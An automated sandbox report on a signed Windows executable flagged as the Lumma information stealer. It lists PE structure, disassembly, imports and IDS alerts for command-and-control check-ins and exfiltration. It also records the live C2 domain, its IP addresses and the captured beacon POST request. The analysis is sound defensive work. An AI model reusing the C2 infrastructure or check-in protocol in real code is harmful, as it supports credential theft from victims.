Subject Chain	CN=Privacy Technologies OU, O=Privacy Technologies OU, S=Harjumaa, C=EE
Version:	3
Thumbprint MD5:	AD1BCBF19AE2F91BB114D33B85359E56
Thumbprint SHA-1:	141D90A1BA8F61863FBEDDF7DD1D66C1D1E0B128
Thumbprint SHA-256:	A08EA2A7A257AD690B988446951E9DEF2986A2F3F546B6F0902805330F3B6B48
Serial:	00D0461B529F67189D43744E9CEFE172AE

Entrypoint Preview

Instruction
call 00007F25ECB544DAh
jmp 00007F25ECB54349h
mov ecx, dword ptr [004257C0h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F25ECB544D6h
test esi, ecx
jne 00007F25ECB544F8h
call 00007F25ECB54501h
mov ecx, eax
cmp ecx, edi
jne 00007F25ECB544D9h
mov ecx, BB40E64Fh
jmp 00007F25ECB544E0h
test esi, ecx
jne 00007F25ECB544DCh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [004257C0h], ecx
not ecx
pop edi
mov dword ptr [00425800h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [004239D8h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00423990h]
xor dword ptr [ebp-04h], eax
call dword ptr [0042398Ch]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [00423A20h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00426AA8h
call dword ptr [004239F8h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F25ECB5948Ah
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23798	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2a000	0xe8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xbac00	0x2e80	.bss
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2b000	0x1940	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1fe58	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1cde8	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x23928	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1a89c	0x1aa00	2c90bf01d6a75cfa91195eab195cb511	False	0.5897795627934272	data	6.625714555730625	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1c000	0x8b24	0x8c00	d082dcd702b8cfd5c38fc05ef266a1f7	False	0.3864955357142857	xBase (0xa) DBF * 0, update-date 170-1-3, with index file .MDX, with memo .FPT	4.662128172849137	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x25000	0x226c	0x1600	982bdad040c9e55617b82cb91da6c951	False	0.39417613636363635	data	4.554102284484849	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bsS	0x28000	0x53	0x200	f5c8cf64c90793e21e616701e55b6530	False	0.17578125	data	1.411880155989052	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.tls	0x29000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2a000	0xe8	0x200	267fca3a548bff3d326d56604fef4ee6	False	0.306640625	data	2.344915704357875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2b000	0x1940	0x1a00	ad27a2fd39c0f74f88141246becd5b06	False	0.7587139423076923	data	6.513010283131139	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x2d000	0x49c00	0x49c00	aebd7a874ba7ff23b618cc323867e6a3	False	1.0003343485169491	data	7.9994076425326295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x77000	0x49c00	0x49c00	aebd7a874ba7ff23b618cc323867e6a3	False	1.0003343485169491	data	7.9994076425326295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x2a060	0x87	XML 1.0 document, ASCII text	English	United States	0.8222222222222222

Imports

DLL

Import

ADVAPI32.dll

CryptContextAddRef

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T13:49:47.532709+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49712	104.21.23.76	443	TCP
2024-12-18T13:49:48.399248+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.9	49712	104.21.23.76	443	TCP
2024-12-18T13:49:48.399248+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49712	104.21.23.76	443	TCP
2024-12-18T13:49:49.654760+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49713	104.21.23.76	443	TCP
2024-12-18T13:49:50.616047+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.9	49713	104.21.23.76	443	TCP
2024-12-18T13:49:50.616047+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49713	104.21.23.76	443	TCP
2024-12-18T13:49:52.808637+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49714	104.21.23.76	443	TCP
2024-12-18T13:49:55.191760+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49715	104.21.23.76	443	TCP
2024-12-18T13:49:57.766463+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49716	104.21.23.76	443	TCP
2024-12-18T13:50:00.723890+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49719	104.21.23.76	443	TCP
2024-12-18T13:50:01.494584+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.9	49719	104.21.23.76	443	TCP
2024-12-18T13:50:03.335163+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49721	104.21.23.76	443	TCP
2024-12-18T13:50:09.275190+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49723	104.21.23.76	443	TCP
2024-12-18T13:50:11.969055+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49723	104.21.23.76	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 13:49:46.214553118 CET	49712	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:46.214577913 CET	443	49712	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:46.214641094 CET	49712	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:46.217725992 CET	49712	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:46.217734098 CET	443	49712	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:47.531558990 CET	443	49712	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:47.532708883 CET	49712	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:47.534358025 CET	49712	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:47.534363031 CET	443	49712	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:47.534604073 CET	443	49712	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:47.580930948 CET	49712	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:47.603797913 CET	49712	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:47.603827000 CET	49712	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:47.603936911 CET	443	49712	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:48.399286985 CET	443	49712	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:48.399380922 CET	443	49712	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:48.399439096 CET	49712	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:48.410841942 CET	49712	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:48.410841942 CET	49712	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:48.410860062 CET	443	49712	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:48.410870075 CET	443	49712	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:48.441617012 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:48.441677094 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:48.441765070 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:48.442090988 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:48.442111969 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:49.654694080 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:49.654759884 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:49.656315088 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:49.656325102 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:49.656604052 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:49.658006907 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:49.658035040 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:49.658087015 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.616048098 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.616777897 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.616848946 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:50.616889000 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.618204117 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.618247986 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.618258953 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:50.618268967 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.618956089 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:50.623804092 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.630660057 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.631480932 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:50.631511927 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.690218925 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:50.690253973 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.736021042 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.737104893 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:50.737131119 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.738528967 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:50.807897091 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.812021017 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.812129974 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:50.812216997 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:51.008712053 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:51.008712053 CET	49713	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:51.008760929 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:51.008775949 CET	443	49713	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:51.498528004 CET	49714	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:51.498573065 CET	443	49714	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:51.498646975 CET	49714	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:51.499134064 CET	49714	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:51.499146938 CET	443	49714	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:52.808445930 CET	443	49714	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:52.808636904 CET	49714	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:52.810141087 CET	49714	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:52.810158968 CET	443	49714	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:52.810415983 CET	443	49714	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:52.812040091 CET	49714	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:52.812189102 CET	49714	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:52.812216043 CET	443	49714	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:53.791563988 CET	443	49714	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:53.791663885 CET	443	49714	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:53.791722059 CET	49714	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:53.791802883 CET	49714	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:53.791822910 CET	443	49714	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:53.976594925 CET	49715	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:53.976650000 CET	443	49715	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:53.976727009 CET	49715	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:53.976986885 CET	49715	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:53.977003098 CET	443	49715	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:55.191628933 CET	443	49715	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:55.191760063 CET	49715	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:55.193073988 CET	49715	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:55.193085909 CET	443	49715	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:55.193324089 CET	443	49715	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:55.194474936 CET	49715	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:55.194603920 CET	49715	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:55.194639921 CET	443	49715	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:55.194709063 CET	49715	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:55.194715977 CET	443	49715	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:56.127691031 CET	443	49715	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:56.127780914 CET	443	49715	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:56.127840042 CET	49715	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:56.128249884 CET	49715	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:56.128268003 CET	443	49715	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:56.553641081 CET	49716	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:56.553745031 CET	443	49716	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:56.553854942 CET	49716	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:56.554155111 CET	49716	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:56.554198027 CET	443	49716	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:57.766297102 CET	443	49716	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:57.766463041 CET	49716	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:57.767750025 CET	49716	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:57.767766953 CET	443	49716	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:57.768062115 CET	443	49716	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:57.769494057 CET	49716	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:57.769646883 CET	49716	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:57.769680977 CET	443	49716	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:57.769895077 CET	49716	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:57.769908905 CET	443	49716	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:58.655837059 CET	443	49716	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:58.655932903 CET	443	49716	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:58.656097889 CET	49716	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:58.675328016 CET	49716	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:58.675379992 CET	443	49716	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:59.501483917 CET	49719	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:59.501533031 CET	443	49719	104.21.23.76	192.168.2.9
Dec 18, 2024 13:49:59.501617908 CET	49719	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:59.501935005 CET	49719	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:49:59.501944065 CET	443	49719	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:00.723746061 CET	443	49719	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:00.723890066 CET	49719	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:00.725153923 CET	49719	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:00.725171089 CET	443	49719	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:00.725460052 CET	443	49719	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:00.737047911 CET	49719	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:00.737461090 CET	49719	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:00.737467051 CET	443	49719	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:01.494590998 CET	443	49719	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:01.494674921 CET	443	49719	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:01.494772911 CET	49719	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:01.526451111 CET	49719	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:01.526465893 CET	443	49719	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:02.116883039 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:02.116910934 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:02.117016077 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:02.117382050 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:02.117399931 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.335074902 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.335163116 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.336707115 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.336713076 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.336996078 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.348099947 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.348859072 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.348896027 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.349704027 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.349740028 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.349849939 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.349886894 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.350032091 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.350045919 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.350194931 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.350208998 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.350358963 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.350383997 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.350394011 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.350538969 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.350568056 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.395342112 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.395560980 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.395598888 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.395606995 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.443336964 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.443536043 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.443582058 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.443605900 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.491333961 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.491540909 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:03.535327911 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:03.591237068 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:07.924148083 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:07.924276114 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:07.924334049 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:07.924829006 CET	49721	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:07.924851894 CET	443	49721	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:07.956264019 CET	49723	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:07.956327915 CET	443	49723	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:07.956413031 CET	49723	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:07.956738949 CET	49723	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:07.956759930 CET	443	49723	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:09.274971008 CET	443	49723	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:09.275190115 CET	49723	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:09.280826092 CET	49723	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:09.280857086 CET	443	49723	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:09.281178951 CET	443	49723	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:09.292860031 CET	49723	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:09.292884111 CET	49723	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:09.292944908 CET	443	49723	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:11.969053984 CET	443	49723	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:11.969150066 CET	443	49723	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:11.969242096 CET	49723	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:11.969518900 CET	49723	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:11.969537973 CET	443	49723	104.21.23.76	192.168.2.9
Dec 18, 2024 13:50:11.969548941 CET	49723	443	192.168.2.9	104.21.23.76
Dec 18, 2024 13:50:11.969553947 CET	443	49723	104.21.23.76	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 13:49:45.866281033 CET	57005	53	192.168.2.9	1.1.1.1
Dec 18, 2024 13:49:46.208689928 CET	53	57005	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 13:49:45.866281033 CET	192.168.2.9	1.1.1.1	0x59b	Standard query (0)	pancakedipyps.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 13:49:46.208689928 CET	1.1.1.1	192.168.2.9	0x59b	No error (0)	pancakedipyps.click		104.21.23.76	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:49:46.208689928 CET	1.1.1.1	192.168.2.9	0x59b	No error (0)	pancakedipyps.click		172.67.209.202	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pancakedipyps.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49712	104.21.23.76	443	7908	C:\Users\user\Desktop\random.exe.10.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:49:47 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: pancakedipyps.click
2024-12-18 12:49:47 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
